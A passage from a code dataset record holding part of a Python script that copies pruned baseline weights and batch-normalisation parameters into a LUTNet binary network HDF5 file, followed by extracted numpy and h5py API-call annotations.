pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_22:0\"]\npret_c23= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_23:0\"]\npret_c24= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_24:0\"]\npret_c25= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_25:0\"]\npret_c26= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_26:0\"]\npret_c27= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_27:0\"]\npret_c28= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_28:0\"]\npret_c29= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_29:0\"]\npret_c30= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_30:0\"]\npret_c31= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_31:0\"]\npret_c32= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_32:0\"]\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_33:0\"]\n\npret_rand_map_exp_0 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_exp_0:0\"]\npret_rand_map_exp_1 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_exp_1:0\"]\npret_rand_map_exp_2 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_exp_2:0\"]\n\nweight_shape = np.shape(bl_w1)\ntile_shape = np.shape(pret_c1)\nzero_fill = np.zeros(tile_shape)\none_fill = np.ones(tile_shape)\nneg_one_fill = -np.ones(tile_shape)\n\n# randomisation and pruning recovery\nbl_w1_unroll = np.array(bl_w1)\nbl_w1 = np.array(bl_w1)\n\nrand_map_0 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_0)\nrand_map_1 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_1)\nrand_map_2 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_2)\n\npruning_mask = np.array(bl_pruning_mask).astype(bool)\ninit_mask = np.logical_not(pruning_mask[rand_map_0])\npruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]\npruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)\ninit_mask = np.reshape(init_mask, tile_shape)\n\n# expand randomisation map across tiles\n\nrand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])\nrand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])\nrand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])\nfor i in range(weight_shape[0]):\n rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n\nbl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]\nbl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)\n\nw1 = bl_w1\n\n# connect1 only\nc1 = one_fill\nc2 = neg_one_fill\nc3 = one_fill\nc4 = neg_one_fill\nc5 = one_fill\nc6 = neg_one_fill\nc7 = one_fill\nc8 = neg_one_fill\nc9 = one_fill\nc10 = neg_one_fill\nc11 = one_fill\nc12 = neg_one_fill\nc13 = one_fill\nc14 = neg_one_fill\nc15 = one_fill\nc16 = neg_one_fill\nc17 = neg_one_fill\nc18 = one_fill\nc19 = neg_one_fill\nc20 = one_fill\nc21 = neg_one_fill\nc22 = one_fill\nc23 = neg_one_fill\nc24 = one_fill\nc25 = neg_one_fill\nc26 = one_fill\nc27 = neg_one_fill\nc28 = one_fill\nc29 = neg_one_fill\nc30 = one_fill\nc31 = neg_one_fill\nc32 = one_fill\n\npret_w1 [...] = w1\npret_c1 [...] = c1\npret_c2 [...] = c2\npret_c3 [...] = c3\npret_c4 [...] = c4\npret_c5 [...] = c5\npret_c6 [...] = c6\npret_c7 [...] = c7\npret_c8 [...] = c8\npret_c9 [...] = c9\npret_c10[...] = c10\npret_c11[...] = c11\npret_c12[...] = c12\npret_c13[...] = c13\npret_c14[...] = c14\npret_c15[...] = c15\npret_c16[...] = c16\npret_c17[...] = c17\npret_c18[...] = c18\npret_c19[...] = c19\npret_c20[...] = c20\npret_c21[...] = c21\npret_c22[...] = c22\npret_c23[...] = c23\npret_c24[...] = c24\npret_c25[...] = c25\npret_c26[...] = c26\npret_c27[...] = c27\npret_c28[...] = c28\npret_c29[...] = c29\npret_c30[...] = c30\npret_c31[...] = c31\npret_c32[...] = c32\n\npret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)\npret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)\npret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)\np_gamma[...] = np.array(bl_gamma)\npret_means[...] = np.array(bl_means)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nrand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)\npret_rand_map_exp_0[...] = rand_map_0_expand\nrand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)\npret_rand_map_exp_1[...] = rand_map_1_expand\nrand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)\npret_rand_map_exp_2[...] = rand_map_2_expand\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n\n# bn 1\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_1\"][\"batch_normalization_1\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] = np.array(bl_moving_variance)\n\n# bn 2\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_2\"][\"batch_normalization_2\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] = np.array(bl_moving_variance)\n\n# bn 3\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_3\"][\"batch_normalization_3\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] = np.array(bl_moving_variance)\n\n# bn 4\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_4\"][\"batch_normalization_4\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] = np.array(bl_moving_variance)\n\n# bn 5\n\nbl_beta = bl[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"beta:0\"]\nbl_gamma = bl[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"gamma:0\"]\nbl_moving_mean = bl[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"moving_mean:0\"]\nbl_moving_variance = bl[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"moving_variance:0\"]\np_beta = pretrained[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"beta:0\"]\np_gamma = pretrained[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"gamma:0\"]\np_moving_mean = pretrained[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"moving_mean:0\"]\np_moving_variance = pretrained[\"model_weights\"][\"batch_normalization_5\"][\"batch_normalization_5\"][\"moving_variance:0\"]\n\np_beta[...] = np.array(bl_beta)\np_gamma[...] = np.array(bl_gamma)\np_moving_mean[...] = np.array(bl_moving_mean)\np_moving_variance[...] = np.array(bl_moving_variance)\n\npretrained.close()\n"},"apis":{"kind":"list like","value":["numpy.tile","numpy.random.shuffle","numpy.reshape","numpy.ones","numpy.logical_and","numpy.logical_not","numpy.logical_or","h5py.File","numpy.argsort","numpy.array","shutil.copyfile","numpy.zeros","numpy.shape","numpy.arange","numpy.set_printoptions"],"string":"[\n \"numpy.tile\",\n \"numpy.random.shuffle\",\n \"numpy.reshape\",\n \"numpy.ones\",\n \"numpy.logical_and\",\n \"numpy.logical_not\",\n \"numpy.logical_or\",\n \"h5py.File\",\n \"numpy.argsort\",\n \"numpy.array\",\n \"shutil.copyfile\",\n \"numpy.zeros\",\n \"numpy.shape\",\n \"numpy.arange\",\n \"numpy.set_printoptions\"\n]"},"extract_api":{"kind":"string","value":"[((31, 68), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'np.nan'}), '(threshold=np.nan)\\n', (50, 68), True, 'import numpy as np\\n'), ((99, 147), 'shutil.copyfile', 'copyfile', (['\"\"\"dummy_lutnet.h5\"\"\"', '\"\"\"pretrained_bin.h5\"\"\"'], {}), \"('dummy_lutnet.h5', 'pretrained_bin.h5')\\n\", (107, 147), False, 'from shutil import copyfile\\n'), ((211, 247), 'h5py.File', 'h5py.File', (['\"\"\"baseline_pruned.h5\"\"\"', '\"\"\"r\"\"\"'], {}), \"('baseline_pruned.h5', 'r')\\n\", (220, 247), False, 'import h5py\\n'), ((297, 333), 'h5py.File', 'h5py.File', (['\"\"\"pretrained_bin.h5\"\"\"', '\"\"\"r+\"\"\"'], {}), \"('pretrained_bin.h5', 'r+')\\n\", (306, 333), False, 'import h5py\\n'), ((949, 964), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (957, 964), True, 'import numpy as np\\n'), ((980, 998), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (988, 998), True, 'import numpy as np\\n'), ((1024, 1049), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (1032, 1049), True, 'import numpy as np\\n'), ((5514, 5529), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\\n', (5522, 5529), True, 'import numpy as np\\n'), ((5543, 5560), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\\n', (5551, 5560), True, 'import numpy as np\\n'), ((5573, 5593), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\\n', (5581, 5593), True, 'import numpy as np\\n'), ((5605, 5624), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (5612, 5624), True, 'import numpy as np\\n'), ((5714, 5729), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (5722, 5729), True, 'import numpy as np\\n'), ((5738, 5753), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (5746, 5753), True, 'import numpy as np\\n'), ((5768, 5792), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (5777, 5792), True, 'import numpy as np\\n'), ((5793, 5822), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\\n', (5810, 5822), True, 'import numpy as np\\n'), ((5836, 5860), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (5845, 5860), True, 'import numpy as np\\n'), ((5861, 5890), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\\n', (5878, 5890), True, 'import numpy as np\\n'), ((5904, 5928), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (5913, 5928), True, 'import numpy as np\\n'), ((5929, 5958), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\\n', (5946, 5958), True, 'import numpy as np\\n'), ((6026, 6066), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\\n', (6040, 6066), True, 'import numpy as np\\n'), ((6169, 6218), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\\n', (6182, 6218), True, 'import numpy as np\\n'), ((6231, 6264), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\\n', (6241, 6264), True, 'import numpy as np\\n'), ((6327, 6381), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\\n', (6334, 6381), True, 'import numpy as np\\n'), ((6399, 6453), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\\n', (6406, 6453), True, 'import numpy as np\\n'), ((6471, 6525), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\\n', (6478, 6525), True, 'import numpy as np\\n'), ((7198, 7236), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\\n', (7208, 7236), True, 'import numpy as np\\n'), ((8681, 8699), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (8689, 8699), True, 'import numpy as np\\n'), ((8718, 8736), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\\n', (8726, 8736), True, 'import numpy as np\\n'), ((8762, 8787), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (8770, 8787), True, 'import numpy as np\\n'), ((13604, 13619), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\\n', (13612, 13619), True, 'import numpy as np\\n'), ((13633, 13650), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\\n', (13641, 13650), True, 'import numpy as np\\n'), ((13663, 13683), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\\n', (13671, 13683), True, 'import numpy as np\\n'), ((13695, 13714), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (13702, 13714), True, 'import numpy as np\\n'), ((13804, 13819), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (13812, 13819), True, 'import numpy as np\\n'), ((13828, 13843), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (13836, 13843), True, 'import numpy as np\\n'), ((13858, 13882), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (13867, 13882), True, 'import numpy as np\\n'), ((13883, 13912), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\\n', (13900, 13912), True, 'import numpy as np\\n'), ((13926, 13950), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (13935, 13950), True, 'import numpy as np\\n'), ((13951, 13980), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\\n', (13968, 13980), True, 'import numpy as np\\n'), ((13994, 14018), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (14003, 14018), True, 'import numpy as np\\n'), ((14019, 14048), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\\n', (14036, 14048), True, 'import numpy as np\\n'), ((14116, 14156), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\\n', (14130, 14156), True, 'import numpy as np\\n'), ((14259, 14308), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\\n', (14272, 14308), True, 'import numpy as np\\n'), ((14321, 14354), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\\n', (14331, 14354), True, 'import numpy as np\\n'), ((14417, 14471), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\\n', (14424, 14471), True, 'import numpy as np\\n'), ((14489, 14543), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\\n', (14496, 14543), True, 'import numpy as np\\n'), ((14561, 14615), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\\n', (14568, 14615), True, 'import numpy as np\\n'), ((15288, 15326), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\\n', (15298, 15326), True, 'import numpy as np\\n'), ((16771, 16789), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (16779, 16789), True, 'import numpy as np\\n'), ((16808, 16826), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\\n', (16816, 16826), True, 'import numpy as np\\n'), ((16852, 16877), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (16860, 16877), True, 'import numpy as np\\n'), ((21694, 21709), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\\n', (21702, 21709), True, 'import numpy as np\\n'), ((21723, 21740), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\\n', (21731, 21740), True, 'import numpy as np\\n'), ((21753, 21773), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\\n', (21761, 21773), True, 'import numpy as np\\n'), ((21785, 21804), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (21792, 21804), True, 'import numpy as np\\n'), ((21894, 21909), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (21902, 21909), True, 'import numpy as np\\n'), ((21918, 21933), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (21926, 21933), True, 'import numpy as np\\n'), ((21948, 21972), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (21957, 21972), True, 'import numpy as np\\n'), ((21973, 22002), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\\n', (21990, 22002), True, 'import numpy as np\\n'), ((22016, 22040), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (22025, 22040), True, 'import numpy as np\\n'), ((22041, 22070), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\\n', (22058, 22070), True, 'import numpy as np\\n'), ((22084, 22108), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (22093, 22108), True, 'import numpy as np\\n'), ((22109, 22138), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\\n', (22126, 22138), True, 'import numpy as np\\n'), ((22206, 22246), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\\n', (22220, 22246), True, 'import numpy as np\\n'), ((22349, 22398), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\\n', (22362, 22398), True, 'import numpy as np\\n'), ((22411, 22444), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\\n', (22421, 22444), True, 'import numpy as np\\n'), ((22507, 22561), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\\n', (22514, 22561), True, 'import numpy as np\\n'), ((22579, 22633), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\\n', (22586, 22633), True, 'import numpy as np\\n'), ((22651, 22705), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\\n', (22658, 22705), True, 'import numpy as np\\n'), ((23378, 23416), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\\n', (23388, 23416), True, 'import numpy as np\\n'), ((24861, 24879), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (24869, 24879), True, 'import numpy as np\\n'), ((24898, 24916), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\\n', (24906, 24916), True, 'import numpy as np\\n'), ((24942, 24967), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (24950, 24967), True, 'import numpy as np\\n'), ((29784, 29799), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\\n', (29792, 29799), True, 'import numpy as np\\n'), ((29813, 29830), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\\n', (29821, 29830), True, 'import numpy as np\\n'), ((29843, 29863), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\\n', (29851, 29863), True, 'import numpy as np\\n'), ((29875, 29894), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\\n', (29882, 29894), True, 'import numpy as np\\n'), ((29984, 29999), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (29992, 29999), True, 'import numpy as np\\n'), ((30008, 30023), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\\n', (30016, 30023), True, 'import numpy as np\\n'), ((30038, 30062), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (30047, 30062), True, 'import numpy as np\\n'), ((30063, 30092), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\\n', (30080, 30092), True, 'import numpy as np\\n'), ((30106, 30130), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (30115, 30130), True, 'import numpy as np\\n'), ((30131, 30160), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\\n', (30148, 30160), True, 'import numpy as np\\n'), ((30174, 30198), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\\n', (30183, 30198), True, 'import numpy as np\\n'), ((30199, 30228), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\\n', (30216, 30228), True, 'import numpy as np\\n'), ((30296, 30336), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\\n', (30310, 30336), True, 'import numpy as np\\n'), ((30439, 30488), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\\n', (30452, 30488), True, 'import numpy as np\\n'), ((30501, 30534), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\\n', (30511, 30534), True, 'import numpy as np\\n'), ((30597, 30651), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\\n', (30604, 30651), True, 'import numpy as np\\n'), ((30669, 30723), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\\n', (30676, 30723), True, 'import numpy as np\\n'), ((30741, 30795), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\\n', (30748, 30795), True, 'import numpy as np\\n'), ((31468, 31506), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\\n', (31478, 31506), True, 'import numpy as np\\n'), ((32951, 32969), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (32959, 32969), True, 'import numpy as np\\n'), ((32988, 33006), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\\n', (32996, 33006), True, 'import numpy as np\\n'), ((33032, 33057), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\\n', (33040, 33057), True, 'import numpy as np\\n'), ((34347, 34364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\\n', (34355, 34364), True, 'import numpy as np\\n'), ((34380, 34398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (34388, 34398), True, 'import numpy as np\\n'), ((34420, 34444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\\n', (34428, 34444), True, 'import numpy as np\\n'), ((34470, 34498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\\n', (34478, 34498), True, 'import numpy as np\\n'), ((35347, 35364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\\n', (35355, 35364), True, 'import numpy as np\\n'), ((35380, 35398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\\n', (35388, 35398), True, 'import numpy as np\\n'), ((35420, 35444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\\n', (35428, 35444), True, 'import numpy as np\\n'), ((35470, 35498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\\n', (35478, 35498), True, 'import numpy as np\\n'), 